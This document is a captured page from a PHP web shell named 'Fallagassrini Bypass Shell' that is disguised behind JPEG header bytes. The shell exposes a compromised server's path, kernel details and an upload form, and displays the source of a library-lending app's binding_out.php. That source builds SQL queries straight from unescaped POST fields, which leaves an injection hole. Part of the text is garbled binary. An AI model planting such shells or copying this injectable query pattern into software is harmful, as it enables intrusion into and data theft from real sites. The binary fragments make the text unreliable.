JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/binding_out.php

<?php
include('is_autheticated.php');

if(isset($_POST['add_binding']))
{

	$is_created=date('Y-m-d H:i:s');
	$book=explode('(',$_REQUEST['book_name']);
	$bar_code=substr($book[1],0,-1);
	$book_name=$book[0];
	 $source=mysql_query("insert into book_binding(base_branch,binding_branch,dates,comments,book_name,bar_code)
	 values('".$_POST['base_branch']."','".$_POST['binding_branch']."','".$_POST['dates']."','".$_POST['comments']."','".$book_name."','".$bar_code."')");
	 
	   $id=mysql_insert_id();
	
	 if($source)
	 { ?>
     <script type="application/javascript">
	 window.location.href="binding.php?msg=success";
	 </script>
	 
	 <?Php 
	 }
	 
	
}
?>
<!DOCTYPE html>
<html lang="en">
	
<!-- Mirrored from jesus.gallery/cloud2/ by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:38:59 GMT -->
<head>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0"> 
		<title>Easwary Library Lending Library</title>
<!--		
		<meta name="author" content="Bootstrap Gallery" />
		<link rel="shortcut icon" href="img/favicon.html">
-->		
		<!-- Bootstrap CSS -->
	<link rel="stylesheet" href="css/bootstrap.min.css" />
<link rel="stylesheet" href="css/bootstrap-responsive.min.css" />
<link rel="stylesheet" href="css/colorpicker.css" />
<link rel="stylesheet" href="css/datepicker.css" />
<link rel="stylesheet" href="css/uniform.css" />
<link rel="stylesheet" href="css/select2.css" />
<link rel="stylesheet" href="css/matrix-style.css" />
<link rel="stylesheet" href="css/matrix-media.css" />
<link rel="stylesheet" href="css/bootstrap-wysihtml5.css" />
<link href="font-awesome/css/font-awesome.css" rel="stylesheet" />
<link href='http://fonts.googleapis.com/css?family=Open+Sans:400,700,800' rel='stylesheet' type='text/css'>

<link rel="stylesheet" href="css/animate.css" />
<link rel="stylesheet" href="css/fullcalendar.css" />
<link rel="stylesheet" href="css/jquery.gritter.css" />

	</head>  
    
    <script src="js/prettify.js"></script>
<script src="jquery.js"></script>
<script src="js/bootstrap-datepicker.js"></script>

	<body>

		<!-- Left sidebar start -->
		<?php include('left_menu.php'); ?>
		<!-- Left sidebar end -->

		<!-- Dashboard Wrapper Start -->
		<div class="dashboard-wrapper">

			<!-- Main Container Start -->
			
				<!-- Top Bar Ends -->
			<?php include('header.php'); ?>
				<!-- Container fluid Starts -->
				<div id="content">
<!--breadcrumbs-->
  <div id="content-header">
    <div id="breadcrumb"> <a href="index.php" title="Go to Home" class="tip-bottom"><i class="icon-home"></i> Home</a><a href="#" class="tip-bottom">Branches</a> <a href="#" class="current">Binding Out</a></div>
  </div>
<!--End-breadcrumbs-->

<!--Action boxes-->
  <div class="container-fluid">
    <div class="row-fluid">
  <div class="span12">
      <div class="widget-box">
        <div class="widget-title"> <span class="icon"> <i class="icon-th-large"></i> </span>
          <h5>Binding Out</h5><span class="icon" style="float:right"><a href="#"> <i class="icon-th-list" title=""></i></a> </span>
        </div>
		
		<div class="widget-content nopadding">

			               <form name="binding_out" id="binding_out" method="post" class="form-horizontal">
						   <label><b style="color:#900"><?php echo $msg_display;?><?php echo $msg_display1;?></b></label>
                           
                            
							 
							   <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Book Branch </label>
							   <div class="controls">
							 <select name="base_branch" id="base_branch"   required tabindex="1">
							 <?php if($_SESSION['branch']==0)
							 $views=mysql_query("select * from branches order by name");  
							 elseif($_SESSION['branch']==1)
							 $views=mysql_query("select * from branches order by name"); 
							 else
							 $views=mysql_query("select * from branches where id='".$_SESSION['branch']."' order by name"); 
								   while($branch=mysql_fetch_array($views)) { 	?>
							 <option value="<?php echo $branch['id']; ?>" ><?php echo $branch['name']; ?></option>
							 <?php } ?>
							  </select>
			                </div>
							</div>
							</div>
                            
                                <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Binding Branch</label>
							   <div class="controls">
							   <select name="binding_branch" id="binding_branch"  required tabindex="2">
							  <?php $views=mysql_query("select * from branches where status=1 order by name"); 
								   while($branch=mysql_fetch_array($views)) { 	?>
							 <option value="<?php echo $branch['id']; ?>" ><?php echo $branch['name']; ?></option>
							 <?php } ?>
							  </select>
			                </div>
							</div>
							</div>
									
							<div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Date</label>
							   <div class="controls">
							    <input type="text"  name="dates" id="dates" value="<?php echo date('d-m-Y'); ?>" autocomplete="off" required tabindex="3">
			                </div>
							</div>
							</div>
							
							 <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Comments</label>
							   <div class="controls">
                              <textarea name="comments"  required cols="20" rows="5" id="comments" tabindex="4"></textarea>
			                </div>		
							</div>
							</div>
									
			               <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Book Code(s)</label>
							   <div class="controls">
                              <textarea cols="5" rows="4" name="book_code"  id="book_code" tabindex="5" ></textarea>
							 <img src="SearchLence.png"  style="width:15px; height:15px; float:right; padding:5px; cursor:pointer" onClick="book_stock(this.value)" >
							 </div>
							 </div>
							 </div>
							 
							
							
                            
							<div class="form-actions" align="center" style="margin-top:250px">
			           <input type="button" id="receipt_book" name="receipt_book" value="List Now" class="btn btn-success" onClick="book_stock(this.value);hidef();" tabindex="6"/>
							<input type="button" name="add_binding" value="Confirm" class="btn btn-success" style="display:none" tabindex="7" />
							<input type="reset" name="cancel" value="Cancel" class="btn btn-danger" onClick="history.go(-1);">
							</div>
			                <div class="panel-body" id="list_books"></div>
			              </form>
			            </div>
			          </div>
			        </div>
			        
			      </div>
			     <div id="list_books"></div>
					
				</div>
				<!-- Container fluid ends -->

			</div>
         
			<!-- Main Container Start -->

			<!-- Footer Start -->
			<div class="row-fluid">
  <div id="footer" class="span12"> Copyright Cloud Admin <span>2015</span>. All Rights Reserved. </div>
</div>
			<!-- Footer end -->
			
		</div>
		<!-- Dashboard Wrapper End -->
        
          

<script type="text/javascript">

function fill(Value)
{
$('#book_name').val(Value);
$('#display').hide();
}
function fill1(Value)
{
$('#author').val(Value);
$('#authordisplay').hide();
}
function fill2(Value)
{
$('#publication').val(Value);
$('#publicationdisplay').hide();
}

$(document).ready(function(){
$("#book_name11").keyup(function() {

var book = $('#book_name').val();
var base_branch = $('#base_branch').val();
var n = book.length;
if(n<4)
{
$("#display").html("");
}
else
{
$.ajax({
type: "POST",
url: "book_binding.php",
data: {book:book, base_branch:base_branch},
//data: "book="+ book ,
success: function(data){
$("#display").html(data).show();
}
});
}
});
$("#author").keyup(function() {
var author = $('#author').val();
if(author=="")
{
$("#authordisplay").html("");
}
else
{
$.ajax({
type: "POST",
url: "ajaxauthor.php",
data: "author="+ author ,
success: function(data){
$("#authordisplay").html(data).show();
}
});
}
});
$("#publication").keyup(function() {
var publication = $('#publication').val();
if(publication=="")
{
$("#publicationdisplay").html("");
}
else
{
$.ajax({
type: "POST",
url: "ajaxpublication.php",
data: "publication="+ publication ,
success: function(data){
$("#publicationdisplay").html(data).show();
}
});
}
});
});

function showbooks(book)
	{
		//alert(ids);
		$.ajax({
		type: "POST",
		url: "get_book.php",
		data: {book:book},
		success: function(data) {
		if(data == 1) {
                    //the email is available
                    $("#bookError").html("Book Already Exist, Kindly give new name");
                	$("#bookError").css('background-color','red');}
                else {
                    //the email is not available
                    $("#bookError").html("");
                }
			}
		});
	
	}

function book_stock()
	{
	
	     var book_code = $('#book_code').val();
		 var branch = $('#base_branch').val();
		 
		$.ajax({
		type: "POST",
		url: "book_binding_request.php",
		data: {branch:branch, book_code:book_code},
		success: 
		function(data) 
		{
                    $("#list_books").html(data);
					
					
					
        }
		
		
 		});
	
	}
	

function hidef()
{
document.getElementById('receipt_book').setAttribute("disabled", "disabled"); 
}
	
	
	function confirmcheckout(id,id1)
	{
	
	if(id==0)
	{
	var bar_code = [];
    $.each($("input[name='bar_code']:checked"), function(){            
          bar_code.push($(this).val());
    });
	id=bar_code.join("','");

	}
	var branch=$('#base_branch').val();//alert(branch);
	var binding_branch=$('#binding_branch').val();//alert(binding_branch);
	//alert(id);
	$.ajax({
		type: "POST",
		url: "binding_out_update.php",
		data: { branch:$('#base_branch').val(),binding_branch:$('#binding_branch').val(),id:id,book_name:$('#book_name').val(),comments:$('#comments').val(),dates:$('#dates').val()},
		success: function(data) {
		//alert(data);
		alert(data+" Binding Out updated Successfully");
		$('#revoke_btn_'+id1).hide();
		$('#revoke_txt_'+id1).show();
		$("#list_books").html('');
		
		}
		});
	}
</script>
		<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
		

		<!-- Include all compiled plugins (below), or include individual files as needed -->
		<script src="js/jquery.min.js"></script> 
<script src="js/jquery.ui.custom.js"></script> 
<script src="js/bootstrap.min.js"></script> 
<script src="js/bootstrap-colorpicker.js"></script> 
<script src="js/bootstrap-datepicker.js"></script> 
<script src="js/jquery.toggle.buttons.js"></script> 
<script src="js/masked.js"></script> 
<script src="js/jquery.uniform.js"></script> 
<script src="js/select2.min.js"></script> 
<script src="js/matrix.js"></script> 
<script src="js/matrix.form_common.js"></script> 
<script src="js/wysihtml5-0.3.0.js"></script> 
<script src="js/jquery.peity.min.js"></script> 
<script src="js/bootstrap-wysihtml5.js"></script> 

<script src="js/bootstrap.min.new.js"></script>
<script src="js/custom.js"></script>
<script>
	$('.textarea_editor').wysihtml5();
</script>
<script src="js/excanvas.min.js"></script> 
<!--<script src="js/jquery.min.js"></script> -->
<script src="js/bootstrap.min.js"></script> 
<script src="js/jquery.flot.min.js"></script> 
<script src="js/jquery.flot.resize.min.js"></script> 
<script src="js/jquery.peity.min.js"></script> 
<script src="js/fullcalendar.min.js"></script> 
<script src="js/matrix.js"></script> 
<script src="js/matrix.dashboard.js"></script> 
<script src="js/jquery.gritter.min.js"></script> 
<script src="js/matrix.interface.js"></script> 
<script src="js/matrix.chat.js"></script> 
<script src="js/jquery.validate.js"></script> 
<script src="js/matrix.form_validation.js"></script> 
<script src="js/jquery.wizard.js"></script> 
<script src="js/jquery.uniform.js"></script> 
<script src="js/matrix.popover.js"></script> 
<script src="js/jquery.dataTables.min.js"></script> 
<script src="js/matrix.tables.js"></script> 

<script type="text/javascript">
        $(document).ready(function () {
          //  setupTinyMCE();
         
		   $('#dates').datepicker({format: 'yyyy-mm-dd'});
			
        });
		
    </script>
    
     <style type="text/css">
	
	button, input, select, textarea {
    border: 2px solid #bfe0f3;
    border-radius: 0;
    box-shadow: none;
    height: 40px;
	 padding: 8px 16px;
}
	
	
	.read_charges {
    border: 2px solid #bfe0f3;
    border-radius: 0;
    box-shadow: none;
    height: 40px;
    padding: 8px 16px;
}
	</style>

	</body>

<!-- Mirrored from jesus.gallery/cloud2/form.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:40:46 GMT -->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net